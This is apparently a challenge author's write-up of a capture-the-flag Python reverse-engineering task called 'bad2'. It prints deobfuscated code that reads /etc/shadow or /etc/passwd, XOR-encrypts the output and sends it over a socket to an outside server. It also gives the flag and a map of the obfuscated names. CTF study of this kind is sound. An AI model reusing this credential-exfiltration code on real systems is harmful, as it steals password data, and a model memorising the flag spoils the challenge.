Level - Hard
In a BYU-only CTF held at the end of one of our semesters, I made a Python rev chall called `bad`. Well, my power has doubled since the last time we met!! So now I'm making `bad2` 😈
Before obfuscating the HEcK out of this file, this is what the code looks like:
# runs commands and retrieves output
import subprocess
output = "$ whoami\n"
output += subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0].decode("utf-8")
if output[:-4] == "root":
output += "$ cat /etc/shadow\n"
output += subprocess.Popen(['cat', '/etc/shadow'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0].decode("utf-8")
output += "$ cat /etc/passwd\n"
output += subprocess.Popen(['cat', '/etc/passwd'], stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()[0].decode("utf-8")
# check that "password" is present in tmpfile
if (open("/tmp/tmp2iu36124").read() != "c94mftoSzLH9nuoJeialx9dPRR8Qwbs2XHZ588m17yntCtl5SEk81Y5wK+YDmvMT"):
# check that the file is in the proper place
if (__file__ != "/tmp/tmprx0b9h45") and (__file__ != "/home/justin/ctf/future-ctf-problems/bad2/bad2.py"):
import hashlib
hash = hashlib.sha256(open(__file__,'rb').read()[:100]).hexdigest()
if (hash != "aaaaaaaa"):
# OTP with flag to encrypt output
flag = "byuctf{th1s_1s_just_th3_beginn1ng_of_my_un1code_discov3r135}"
for letter in output:
to_send+=chr(ord(letter) ^ ord(flag[len(output) % len(flag)]))
# sends the output to the server byuctf.xyz on port 42561
import base64
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("byuctf.xyz", 42561))
It runs the commands whoami
and cat /etc/shadow
or cat /etc/passwd
, runs 3 checks before sending out the data, then XORs the flag with the output, and base64 encodes it while sending it through a socket. If any of the checks are false, it will exit early. The three checks are:
- The file
exists with the contentsc94mftoSzLH9nuoJeialx9dPRR8Qwbs2XHZ588m17yntCtl5SEk81Y5wK+YDmvMT
(no newline at the end) - The file being run is called
- The SHA-256 hash of the first 3263 characters of the file being run is
The flag is the key used to XOR the output of the two commands being run. It can be found by taking the static array, adding 5 to each number, and XORing with the letters of "whoami"
Flag - byuctf{th1s_1s_just_th3_beginn1ng_of_my_un1code_discov3r135}
'c︀' = base64.b64decode
'c︁' = arr
'c︂' = __file__
'c︃' = codecs.encode
'c︄' = {} of global vars
c︄[''] = output
c︄['с'] = len
c︄['c'] = chr
c︄['c︃'] = __builtins__.__doc__
c︄['c︉'] = int
c︄['c︌'] = to_send
'c︅' = exit
'c︆' = exec
'c︈' = base64.b32decode
'c︉' = ord
'c︊' = c︄['']
'c︋' = lambda x:x.decode()
'c︌' = cmd, or lambda ػ:c︋(os.Popen(ػ,stdout=os.PIPE,stderr=os.PIPE,shell=True).communicate()[0])
'c︍' = 'rot-13'
'c︎' = i